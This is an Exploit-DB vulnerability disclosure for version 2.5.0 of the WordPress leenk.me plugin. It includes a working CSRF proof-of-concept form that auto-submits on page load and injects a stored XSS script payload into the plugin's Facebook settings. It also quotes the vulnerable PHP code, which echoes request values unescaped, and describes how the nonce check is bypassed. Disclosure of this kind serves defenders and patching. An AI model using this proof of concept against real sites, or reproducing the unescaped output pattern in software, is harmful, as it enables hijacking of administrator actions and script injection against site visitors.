WordPress leenk.me Plugin 2.5.0 - CSRF/XSS

ID EDB-ID:39704
Type exploitdb
Reporter cor3sm4sh3r
Modified 2016-04-18T00:00:00


WordPress leenk.me Plugin 2.5.0 - CSRF/XSS. Webapps exploit for php platform

                                            I would like to disclose CSRF and stored XSS vulnerability in Wordpress
plugin LeenkMe version 2.5.0.

The plugin can be found at https://wordpress.org/plugins/leenkme/

In the page wp-content/plugins/leenkme/facebook.php

XSS vulnerable Fields are :

   - facebook_message
   - facebook_linkname
   - facebook_caption
   - facebook_description
   - default_image
   - _wp_http_referer

This CSRF is tested on latest wordpress installation 4.4.2 using firefox

The Code for CSRF.html is

  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="" method="POST">
      <input type="hidden" name="facebook_profile" value="on" />
      <input type="hidden" name="fb_publish_wpnonce" value="" />
      <input type="hidden" name="_wp_http_referer" value="XSS" />
      <input type="hidden" name="facebook_message" value="XSS" />
      <input type="hidden" name="facebook_linkname" value="XSS" />
      <input type="hidden" name="facebook_caption" value="XSS" />
      <input type="hidden" name="facebook_description" value="
</textarea><script>prompt();</script>" />
      <input type="hidden" name="default_image" value="XSS" />
      <input type="hidden" name="message_preference" value="author" />
      <input type="hidden" name="clude" value="in" />
      <input type="hidden" name="publish_cats[]" value="0" />
      <input type="hidden" name="update_facebook_settings"
value="Save Settings" />
      <input type="submit" value="Submit form" />

The vulnerable page is


The vulnerable code producing XSS is

if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];


<td><textarea name="facebook_message" style="width: 500px;"
echo $user_settings['facebook_message']; ?></textarea></td>
                             <td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
                                <td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>"  maxlength="100"/></td>
                             <td><?php _e( 'Default Caption:', 'leenkme' );
                                <td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
                             <td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
                                <td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?></textarea></td>

The code used to protect against CSRF that is the anti csrf token used is

<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>

But this code is not protecting against the CSRF, the form get submitted
successfully with out any error even though the fb_publish_wpnonce is kept
empty resulting in CSRF vulnerability.

# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r